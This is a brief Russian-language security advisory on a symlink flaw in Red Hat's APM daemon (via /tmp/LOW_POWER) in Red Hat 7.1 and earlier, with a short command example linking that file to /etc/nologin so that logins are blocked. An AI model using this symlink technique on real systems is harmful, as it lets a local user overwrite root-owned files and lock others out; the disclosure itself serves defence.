Демон Расширенного управление питанием (Advanced Power Management), поставляемый с некоторыми версиями RedHat, содержит уязвимость символьных линков (в файле tmp/LOW_POWER), которая позволяет локальному пользователю записывать поверх и создавать файлы с привилегиями
администратора.
Уязвимы Red Hat 7.1 и более ранние версии.
Пример:
$ ssh foo
$ exit
$ ln -s /etc/nologin /tmp/LOW_POWER
...[provoke low-battery state; e.g. cut powerline and wait some time] ...
$ ssh foo
Connection to foo closed.
$
